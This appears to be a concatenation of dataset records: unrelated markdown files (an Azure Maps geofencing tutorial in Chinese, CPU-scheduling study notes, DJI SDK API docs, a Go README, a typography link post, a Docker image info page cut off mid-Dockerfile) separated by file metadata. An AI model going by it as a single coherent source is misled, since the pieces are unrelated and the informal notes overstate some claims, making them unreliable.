"https://atlas.microsoft.com/mapData/metadata/{udId}?api-version=1.0" } ``` ## <a name="set-up-an-event-handler"></a>设置事件处理程序 在本部分中,我们创建一个用于接收通知的事件处理程序。 此事件处理程序应将任何设备的进入和退出事件通知给运营管理员。 我们将生成两项[逻辑应用](https://docs.microsoft.com/azure/event-grid/event-handlers#logic-apps)服务来处理进入和退出事件。 逻辑应用中的事件触发时,会按顺序触发更多事件。 可以向运营管理员发送警报(在本例中为电子邮件)。 下图演示了如何针对地域隔离区进入事件创建逻辑应用。 可按类似方式针对退出事件创建另一个逻辑应用。 有关详细信息,请参阅所有[支持的事件处理程序](https://docs.microsoft.com/azure/event-grid/event-handlers)。 1. 在 Azure 门户中创建逻辑应用。 在 Azure 市场中选择逻辑应用。 然后,选择“创建”按钮。 ![创建 Azure 逻辑应用以处理地理围栏事件](./media/tutorial-geofence/logic-app.png) 2. 在逻辑应用的设置菜单上,导航到“逻辑应用设计器” 3. 选择 HTTP 请求触发器,然后选择“新建步骤”。 在 Outlook 连接器中,选择“发送电子邮件”作为操作 ![逻辑应用架构](./media/tutorial-geofence/logic-app-schema.png) 4. 填充用于发送电子邮件的字段。 保留 HTTP URL,单击“保存”后,它会自动生成 ![生成逻辑应用终结点](./media/tutorial-geofence/logic-app-endpoint.png) 5. 保存该逻辑应用以生成 HTTP URL 终结点并复制 HTTP URL。 ## <a name="create-an-azure-maps-events-subscription"></a>创建 Azure Maps 事件订阅 Azure Maps 支持三种事件类型。 可在[此处](https://docs.microsoft.com/azure/event-grid/event-schema-azure-maps)查看 Azure Maps 支持的事件类型。 我们需要两个不同的事件订阅,一个用于输入事件,另一个用于退出事件。 遵循以下步骤针对地域隔离区进入事件创建事件订阅。 可按类似的方式订阅地域隔离区退出事件。 1. 导航到 Azure Maps 帐户。 在仪表板中,选择“订阅”。 单击订阅名称,然后在设置菜单中命名并选择“事件”。 ![导航到 Azure Maps 帐户事件](./media/tutorial-geofence/events-tab.png) 2. 若要创建事件订阅,请从“事件”页中选择“事件订阅”。 ![创建 Azure Maps 事件订阅](./media/tutorial-geofence/create-event-subscription.png) 3. 为事件订阅命名,并订阅“进入”事件类型。 现在,选择“Web Hook”作为“终结点类型”。 单击“选择终结点”,将逻辑应用 HTTP URL 终结点复制到“{Endpoint}”中 ![Azure Maps 事件订阅详细信息](./media/tutorial-geofence/events-subscription.png) ## <a name="use-geofence-api"></a>使用地域隔离区 API 可以使用地理围栏 API 来检查**设备**是在地理围栏内部还是外部。 让我们针对不同位置(其中的特定设备随时间而移动)查询地理围栏 GET API。 下图演示了五个施工设备所处的五个位置。 > [!Note] > 该方案和行为基于相同的**设备 ID**,因此,它反映了下图所示的五个不同位置。 在查询设备位置时,“deviceId”是在 GET 请求中为设备提供的唯一 ID。 向“搜索地理围栏 - GET API” 发出异步请求时,可以借助“deviceId”针对该设备发布地理围栏事件(相对于指定的地理围栏)。 在本教程中,我们已通过唯一的“deviceId”向 API 发出了异步请求。 本教程中的请求按时间顺序发出,如图所示。 每当设备进入或退出地理围栏时,响应中的“isEventPublished”属性就会发布。 无需注册设备即可完成本教程。 让我们回顾一下关系图。 其中的每个位置用于针对隔离区评估地域隔离区进入和退出状态更改。 如果发生状态更改,地域隔离区服务会触发一个事件,事件网格会将该事件发送到逻辑应用。 因此,运营管理员会通过电子邮件收到相应的进入或退出通知。 ![Azure Maps 中的地理围栏图](./media/tutorial-geofence/geofence.png) 在 Postman 应用中,在上面创建的同一集合中打开一个新的选项卡。 在生成器选项卡上选择 GET HTTP 方法: 下面是五个 HTTP GET 地理围栏 API 请求,其中包含设备的不同位置坐标。 这些坐标是按时间顺序观察到的。 每个请求后接响应正文。 1. 位置 1: ```HTTP https://atlas.microsoft.com/spatial/geofence/json?subscription-key={subscription-key}&api-version=1.0&deviceId=device_01&udId={udId}&lat=47.638237&lon=-122.1324831&searchBuffer=5&isAsync=True&mode=EnterAndExit ``` ![地域隔离区查询 1](./media/tutorial-geofence/geofence-query1.png) 在上述响应中,与主要地理围栏的距离为负表示设备在地理围栏内。 与子场地地理围栏的距离为正表示设备在子场地地理围栏外。 2. 位置 2: ```HTTP https://atlas.microsoft.com/spatial/geofence/json?subscription-key={subscription-key}&api-version=1.0&deviceId=device_01&udId={udId}&lat=47.63800&lon=-122.132531&searchBuffer=5&isAsync=True&mode=EnterAndExit ``` ![地域隔离区查询 2](./media/tutorial-geofence/geofence-query2.png) 仔细查看上述 JSON 响应可以发现,设备在子场地范围之外,但在主要围栏之内。 不触发任何事件,也不发送任何电子邮件。 3. 位置 3: ```HTTP https://atlas.microsoft.com/spatial/geofence/json?subscription-key={subscription-key}&api-version=1.0&deviceId=device_01&udId={udId}&lat=47.63810783315048&lon=-122.13336020708084&searchBuffer=5&isAsync=True&mode=EnterAndExit ``` ![地域隔离区查询 3](./media/tutorial-geofence/geofence-query3.png) 发生了状态更改,设备现在位于主要地域隔离区和子场地地域隔离区的范围之内。 此更改导致系统发布事件,并向运营管理员发送通知电子邮件。 4. 位置 4: ```HTTP https://atlas.microsoft.com/spatial/geofence/json?subscription-key={subscription-key}&api-version=1.0&deviceId=device_01&udId={udId}&lat=47.637988&lon=-122.1338344&searchBuffer=5&isAsync=True&mode=EnterAndExit ``` ![地域隔离区查询 4](./media/tutorial-geofence/geofence-query4.png) 仔细观察相应的响应可以发现,此处即使设备已经退出子场地地域隔离区,也不会发布任何事件。 查看用户在 GET 请求中的指定时间可以发现,子场地地理围栏此时已过期。 设备仍在主地理围栏内。 在响应正文中的 `expiredGeofenceGeometryId` 下面还可以看到子场地地域隔离区的几何 ID。 5. 位置 5: ```HTTP https://atlas.microsoft.com/spatial/geofence/json?subscription-key={subscription-key}&api-version=1.0&deviceId=device_01&udId={udId}&lat=47.63799&lon=-122.134505&userTime=2019-01-16&searchBuffer=5&isAsync=True&mode=EnterAndExit ``` ![地域隔离区查询 5](./media/tutorial-geofence/geofence-query5.png) 可以看到,设备已离开主要工地地域隔离区。 事件已发布,警报电子邮件已发送给运营管理员。 ## <a name="next-steps"></a>后续步骤 本教程介绍了如何通过在 Azure Maps 和数据服务中使用数据上传 API 上传地理围栏来设置地理围栏。 此外,介绍了如何使用 Azure Maps 事件网格来订阅和处理地域隔离区事件。 * 请参阅[在 Azure 逻辑应用中处理内容类型](https://docs.microsoft.com/azure/logic-apps/logic-apps-content-type),了解如何使用逻辑应用来分析 JSON,以生成更复杂的逻辑。 * 若要详细了解事件网格中的事件处理程序,请参阅[事件网格支持的事件处理程序](https://docs.microsoft.com/azure/event-grid/event-handlers)。
34.861111
280
0.661753
yue_Hant
0.767134
bb2e32d37a8c282865e62ec957381c7ea32e1eff
3,322
md
Markdown
OperatingSystem/OS_notes/unit4-CPU/cpu-scheduling-algo.md
Godxlove/christ-notes2
5fdb6a16263e94066f48fcf1566b5eea82abb9cc
[ "MIT" ]
null
null
null
OperatingSystem/OS_notes/unit4-CPU/cpu-scheduling-algo.md
Godxlove/christ-notes2
5fdb6a16263e94066f48fcf1566b5eea82abb9cc
[ "MIT" ]
null
null
null
OperatingSystem/OS_notes/unit4-CPU/cpu-scheduling-algo.md
Godxlove/christ-notes2
5fdb6a16263e94066f48fcf1566b5eea82abb9cc
[ "MIT" ]
null
null
null
[this is some good note](https://condor.depaul.edu/glancast/343class/hw/hw4ans.html) along with [this](https://condor.depaul.edu/glancast/343class/hw/hw3ans.html) (idk why I put this). --- ## Notes on CPU scheduling algo #### FCFS (first come first serve) reference [video](https://youtu.be/WYo1SpUh9FI) and [this](https://youtu.be/MZdVAVMgNpA) 1. it is a non-preemptive algo. 2. assigns CPU to the first process which comes in (criteria is "arrival time") 3. The process order matter when there are two processes having the same arrival time. (choose the first one which appears in the list) 4. WAITING TIME = RESPONSE TIME (non-preemptive) Columns to be made - process no., arrival time, burst time, completion time, turn around time, waiting time, response time **May ask about** avg turn around time and avg waiting time. ---- <br> #### SJF non-preemptive (Shortest Job First) reference [video](https://youtu.be/VCIVXPoiLpU) and [this](https://youtu.be/pYO-FAg-TpQ) 1. it is a non-preemptive algo (a process once executed will not be interrupted untill it is over) 2. assigns CPU to the process which has the least burst time (**criteria is "burst time"**) - but do check the arrival time. 3. The arrival time matters when there are two processes having the same burst time. If both arrival and burst time as same then choose the process number order. 4. WAITING TIME = RESPONSE TIME (non-preemptive) Columns to be made - process no., arrival time, burst time, completion time, turn around time, waiting time, response time May ask about avg turn around time and avg waiting time. <br> --- #### # Shortest Remaining Time First (SRTF) = SJF preemptive - minimal time taking algo reference [video](https://youtu.be/_QcX99B-zbU) and [this](https://youtu.be/hoN7_VMzw_g) Whenever new a new process arrives, there may be preemption of the current running process. 1. it is a preemptive algo (a process executing can be interrupted in place of a more important process) 2. assigns CPU to the process which has the least burst time (**criteria is "burst time"**) - but do check the arrival time. 3. Check if any process is there in the ready queue at each unit of time. Since any process can overtake the current running process due to preemption (if the former has less burst time). 4. After almost all of the processes have appeared in the grantt chart then you should put the processes as per the SJF algo method. (**important**) 5. if burst time is same, then check the arrival time and compare it. 6. WAITING TIME != RESPONSE TIME (preemptive algo) Columns to be made - process no., arrival time, burst time, completion time, turn around time, waiting time, response time Be careful while writing the completion time and response time. Waiting time is to be calculated based on turn around time - initial burst time. May ask about avg turn around time, avg response time and avg waiting time <br> NOTE - SRTF algo is the most optimised algo which has the lowest avg waiting time among all the cpu scheduling algo present in the world. <br> ---- <br> --- Read from sir's notes given below and practice them using question from [assignment-async](assignment-async.md). Gayathri's solutions are there to check if you have done it correctly. <br> ![](CPU-Process-Scheduling-Solved-Problems.pdf)
43.142857
187
0.754967
eng_Latn
0.996304
bb2edd597ac72d2273d670964adfeab912492b84
12,383
md
Markdown
docs/API Reference/Components/Camera/DJICamera_DJICameraSSDState.md
ryaa/Mobile-SDK-Android
6f99dd8190e202c71fd0838a9e170317236c60e4
[ "MIT" ]
null
null
null
docs/API Reference/Components/Camera/DJICamera_DJICameraSSDState.md
ryaa/Mobile-SDK-Android
6f99dd8190e202c71fd0838a9e170317236c60e4
[ "MIT" ]
null
null
null
docs/API Reference/Components/Camera/DJICamera_DJICameraSSDState.md
ryaa/Mobile-SDK-Android
6f99dd8190e202c71fd0838a9e170317236c60e4
[ "MIT" ]
null
null
null
<div class="article"><h1 ><font color="#AAA">class </font>SSDState</h1></div> ~~~java @EXClassNullAway class SSDState ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr></table></html> ##### Description: <font color="#666">This class contains the information about camera's Solid State Drive (SSD) information, including state, whether it is connected, its capacity, video size and rate, etc. ##### Class Members: <div class="api-row" id="djicamera_cameraupdatedssdstatecallbackinterface"><div class="api-col left">Callback</div><div class="api-col middle" style="color:#AAA">class</div><div class="api-col right"><a href="/Components/Camera/DJICamera_CameraUpdatedSSDStateCallbackInterface.html">Callback</a></div></div><div class="api-row" id="djicamera_djicamerassdstate_operationstate"><div class="api-col left">Operating State</div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_operationstate_inline">getSSDOperationState</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_operationstate_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getSSDOperationState</h6></div> ~~~java SSDOperationState getSSDOperationState() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_operation_state_key">CameraKey.SSD_OPERATION_STATE</a></td></tr></table></html> ##### Description: <font color="#666">SSD state information for currently executing operations. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41"><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicamerassdoperationstate">SSDOperationState</a></td><td><font color="#666"><i>An instance of <code><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicamerassdoperationstate">SSDOperationState</a></code>.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_isconnected"><div class="api-col left"></div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_isconnected_inline">isConnected</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_isconnected_inline" ><div class="article"><h6 ><font color="#AAA">method </font>isConnected</h6></div> ~~~java boolean isConnected() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_is_connected_key">CameraKey.SSD_IS_CONNECTED</a></td></tr></table></html> ##### Description: <font color="#666"><code>true</code> if the SSD is connected. Note, if the camera is disconnected, the values for other properties in <code><a href="/Components/Camera/DJICamera_DJICameraSSDState.html#djicamera_djicamerassdstate">SSDState</a></code> are undefined. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41">boolean</td><td><font color="#666"><i>A boolean value.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_totalspace"><div class="api-col left">Capacity</div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_totalspace_inline">getCapacity</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_totalspace_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getCapacity</h6></div> ~~~java SSDCapacity getCapacity() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_total_space_key">CameraKey.SSD_TOTAL_SPACE</a></td></tr></table></html> ##### Description: <font color="#666">SSD's total capacity. @return Total SSD capacity. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41"><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicamerassdcapacity">SSDCapacity</a></td><td><font color="#666"><i>An instance of <code><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicamerassdcapacity">SSDCapacity</a></code>.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_availablerecordingtimeinseconds"><div class="api-col left"></div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_availablerecordingtimeinseconds_inline">getAvailableRecordingTimeInSeconds</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_availablerecordingtimeinseconds_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getAvailableRecordingTimeInSeconds</h6></div> ~~~java int getAvailableRecordingTimeInSeconds() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_available_recording_time_in_seconds_key">CameraKey.SSD_AVAILABLE_RECORDING_TIME_IN_SECONDS</a></td></tr></table></html> ##### Description: <font color="#666">SSD's remaining time in seconds, based on the current <code><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicameravideoresolution">VideoResolution</a></code> and <code><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicameravideoframerate">VideoFrameRate</a></code>. @return SSD's remaining time measured in seconds. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41">int</td><td><font color="#666"><i>An int value.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_remainingspaceinmegabytes"><div class="api-col left"></div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_remainingspaceinmegabytes_inline">getRemainingSpaceInMB</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_remainingspaceinmegabytes_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getRemainingSpaceInMB</h6></div> ~~~java long getRemainingSpaceInMB() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_remaining_space_in_mb_key">CameraKey.SSD_REMAINING_SPACE_IN_MB</a></td></tr></table></html> ##### Description: <font color="#666">SSD's remaining capacity in MB. @return SSD's remaining capacity measured in MB. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41">long</td><td><font color="#666"><i>A long value.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_videoresolution"><div class="api-col left">Video</div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_videoresolution_inline">getVideoResolution</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_videoresolution_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getVideoResolution</h6></div> ~~~java VideoResolution getVideoResolution() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_video_resolution_and_frame_rate_key">CameraKey.SSD_VIDEO_RESOLUTION_AND_FRAME_RATE</a></td></tr></table></html> ##### Description: <font color="#666">Video resolution to be saved to SSD. @return SSD's video resolution. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41"><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicameravideoresolution">VideoResolution</a></td><td><font color="#666"><i>A <code><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicameravideoresolution">VideoResolution</a></code> enum value.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_videoframerate"><div class="api-col left"></div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_videoframerate_inline">getVideoFrameRate</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_videoframerate_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getVideoFrameRate</h6></div> ~~~java VideoFrameRate getVideoFrameRate() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_ssd_video_resolution_and_frame_rate_key">CameraKey.SSD_VIDEO_RESOLUTION_AND_FRAME_RATE</a></td></tr></table></html> ##### Description: <font color="#666">Video framerate to be saved to SSD. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41"><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicameravideoframerate">VideoFrameRate</a></td><td><font color="#666"><i>A <code><a href="/Components/Camera/DJICamera_DJICameraSettingsDef.html#djicamera_djicameravideoframerate">VideoFrameRate</a></code> enum value.</i></td></tr></table></html></div> <div class="api-row" id="djicamera_djicamerassdstate_rawphotoburstcount"><div class="api-col left">Photo</div><div class="api-col middle" style="color:#AAA">method</div><div class="api-col right"><a class="trigger" href="#djicamera_djicamerassdstate_rawphotoburstcount_inline">getRAWPhotoBurstCount</a></div></div><div class="inline-doc" id="djicamera_djicamerassdstate_rawphotoburstcount_inline" ><div class="article"><h6 ><font color="#AAA">method </font>getRAWPhotoBurstCount</h6></div> ~~~java int getRAWPhotoBurstCount() ~~~ <html><table class="table-supportedby"><tr valign="top"><td width=15%><font color="#999"><i>Package:</i></td><td width=85%><font color="#999">dji.common.camera</td></tr><tr valign="top"><td width=15%><font color="#999"><i>SDK Key:</i></td><td width=85%><font color="#999"><a href="/Components/KeyManager/DJICameraKey.html#camerakey_raw_photo_burst_count_key">CameraKey.RAW_PHOTO_BURST_COUNT</a></td></tr></table></html> ##### Description: <font color="#666">Number of photos that are shot in RAW burst mode. ##### Return: <html><table class="table-inline-parameters"><tr valign="top"><td><font color="#70BF41">int</td><td><font color="#666"><i>An int value.</i></td></tr></table></html></div>
57.595349
700
0.733829
kor_Hang
0.209717
bb2f06bf530444a89364db646d4242d20f67360f
353
md
Markdown
README.md
rootVIII/al-Go-rithms
7dcc5faa59ae1c8ef28447b70af82de0c54c6bf9
[ "MIT" ]
null
null
null
README.md
rootVIII/al-Go-rithms
7dcc5faa59ae1c8ef28447b70af82de0c54c6bf9
[ "MIT" ]
null
null
null
README.md
rootVIII/al-Go-rithms
7dcc5faa59ae1c8ef28447b70af82de0c54c6bf9
[ "MIT" ]
null
null
null
# al-Go-rithms This repository has algorithms implemented in Go [![Build Status](https://travis-ci.com/addy1997/al-Go-rithms.svg?branch=main)](https://travis-ci.com/addy1997/al-Go-rithms) [![Total alerts](https://img.shields.io/lgtm/alerts/g/addy1997/al-Go-rithms.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/addy1997/al-Go-rithms/alerts/)
58.833333
163
0.759207
yue_Hant
0.621962
bb2f0d37d3cdad487e3ae1167bd65a7d63ed2ba2
1,105
md
Markdown
posts/tipofobia02.md
eduf/eduf
e545be516b001427e6fdf38a7e252ebf170fcf67
[ "MIT" ]
null
null
null
posts/tipofobia02.md
eduf/eduf
e545be516b001427e6fdf38a7e252ebf170fcf67
[ "MIT" ]
null
null
null
posts/tipofobia02.md
eduf/eduf
e545be516b001427e6fdf38a7e252ebf170fcf67
[ "MIT" ]
null
null
null
--- title: Tipofobia 02 date: 2021-04-27T15:30:43-03:00 metaDescription: Mais recomendações para o seu prazer tipográfico. tags: - Tipofobia - Tipografia --- ![Beatrice Font](/static/img/beatrice.jpg) Beatrice é a irmã descolada. Beatrice Display, a tia louca, revolucionária na juventude. [Specimen aqui](https://sharptype.co/typefaces/beatrice/#specimen "Beatrice fonts"). ![Almarena Display](/static/img/almarena.jpg) Como descrever [Almarena Display](https://www.behance.net/gallery/102048615/Almarena-Typeface "Almarena Display")? É uma fonte “escorregadia grotesca”? Note o R maiúsculo e o S. ![Fifty Two](/static/img/52.jpg) O combate ao COVID-19 na Índia vai de mal a pior. Dá até uma certa dor na consciência de mostrar o site [Fifty Two](https://fiftytwo.in/ "52 site"), com histórias do país que raramente vemos na mídia. Mas, enfim, é um excelente design. Não posso deixar passar. [Old Book Illustrations](https://www.oldbookillustrations.com/subjects/ "Ilustrações antigas gratuitas") traz centenas de ilustrações gratuitas pra usar naquele seu projeto de livro do século 19.
61.388889
260
0.763801
por_Latn
0.992274
bb2f7a2b3d1d3ce16773b9959c9ea88ebd1e7671
53,011
md
Markdown
repos/wordpress/remote/cli-2-php7.3.md
Alizamani2731/repo-info
79dcc3d5e8fe76689abf6ab987d22e105509fa30
[ "Apache-2.0" ]
null
null
null
repos/wordpress/remote/cli-2-php7.3.md
Alizamani2731/repo-info
79dcc3d5e8fe76689abf6ab987d22e105509fa30
[ "Apache-2.0" ]
null
null
null
repos/wordpress/remote/cli-2-php7.3.md
Alizamani2731/repo-info
79dcc3d5e8fe76689abf6ab987d22e105509fa30
[ "Apache-2.0" ]
null
null
null
## `wordpress:cli-2-php7.3` ```console $ docker pull wordpress@sha256:3c468ff3fa4f6ce80624bd3aa9500d2b5c1ebdb0ab45a82a5db833c524635323 ``` - Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json` - Platforms: - linux; amd64 - linux; arm variant v6 - linux; arm64 variant v8 - linux; 386 - linux; ppc64le ### `wordpress:cli-2-php7.3` - linux; amd64 ```console $ docker pull wordpress@sha256:b01700fac0c4053a0454503275a05108b7c2556fbb17455b50d5a7f68fc20da8 ``` - Docker Version: 18.06.1-ce - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **44.2 MB (44223996 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:06732fc9b3fa51836ad891ee91f69af11763ab5b10da1dc90b52672c281b25a5` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["wp","shell"]` ```dockerfile # Fri, 21 Dec 2018 00:21:29 GMT ADD file:2ff00caea4e83dfade726ca47e3c795a1e9acb8ac24e392785c474ecf9a621f2 in / # Fri, 21 Dec 2018 00:21:30 GMT CMD ["/bin/sh"] # Fri, 21 Dec 2018 01:27:04 GMT ENV PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c # Fri, 21 Dec 2018 01:27:06 GMT RUN apk add --no-cache --virtual .persistent-deps ca-certificates curl tar xz libressl # Fri, 21 Dec 2018 01:27:07 GMT RUN set -x && addgroup -g 82 -S www-data && adduser -u 82 -D -S -G www-data www-data # Fri, 21 Dec 2018 01:27:07 GMT ENV PHP_INI_DIR=/usr/local/etc/php # Fri, 21 Dec 2018 01:27:08 GMT RUN mkdir -p $PHP_INI_DIR/conf.d # Fri, 21 Dec 2018 01:27:08 GMT ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 01:27:09 GMT ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 01:27:09 GMT ENV PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie # Fri, 21 Dec 2018 01:27:09 GMT ENV GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D # Fri, 11 Jan 2019 00:47:29 GMT ENV PHP_VERSION=7.3.1 # Fri, 11 Jan 2019 00:47:30 GMT ENV PHP_URL=https://secure.php.net/get/php-7.3.1.tar.xz/from/this/mirror PHP_ASC_URL=https://secure.php.net/get/php-7.3.1.tar.xz.asc/from/this/mirror # Fri, 11 Jan 2019 00:47:30 GMT ENV PHP_SHA256=cfe93e40be0350cd53c4a579f52fe5d8faf9c6db047f650a4566a2276bf33362 PHP_MD5= # Fri, 11 Jan 2019 00:47:35 GMT RUN set -xe; apk add --no-cache --virtual .fetch-deps gnupg wget ; mkdir -p /usr/src; cd /usr/src; wget -O php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_MD5" ]; then echo "$PHP_MD5 *php.tar.xz" | md5sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then wget -O php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; command -v gpgconf > /dev/null && gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apk del .fetch-deps # Fri, 11 Jan 2019 00:47:35 GMT COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/ # Fri, 11 Jan 2019 00:53:47 GMT RUN set -xe && apk add --no-cache --virtual .build-deps $PHPIZE_DEPS argon2-dev coreutils curl-dev libedit-dev libressl-dev libsodium-dev libxml2-dev sqlite-dev && export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" && docker-php-source extract && cd /usr/src/php && gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" && ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-curl --with-libedit --with-openssl --with-zlib $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') $PHP_EXTRA_CONFIGURE_ARGS && make -j "$(nproc)" && make install && { find /usr/local/bin /usr/local/sbin -type f -perm +0111 -exec strip --strip-all '{}' + || true; } && make clean && cp -v php.ini-* "$PHP_INI_DIR/" && cd / && docker-php-source delete && runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )" && apk add --no-cache --virtual .php-rundeps $runDeps && apk del .build-deps && pecl update-channels && rm -rf /tmp/pear ~/.pearrc # Fri, 11 Jan 2019 00:53:47 GMT COPY multi:ca5e0e0a22a9acaec52323defcda7c7634bb6522f257ec20bee1888aede2387a in /usr/local/bin/ # Fri, 11 Jan 2019 00:53:55 GMT RUN docker-php-ext-enable sodium # Fri, 11 Jan 2019 00:53:55 GMT ENTRYPOINT ["docker-php-entrypoint"] # Fri, 11 Jan 2019 00:53:55 GMT CMD ["php" "-a"] # Fri, 11 Jan 2019 03:53:42 GMT RUN set -ex; apk add --no-cache --virtual .build-deps libjpeg-turbo-dev libpng-dev libzip-dev ; docker-php-ext-configure gd --with-png-dir=/usr --with-jpeg-dir=/usr; docker-php-ext-install gd mysqli opcache zip; runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local/lib/php/extensions | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 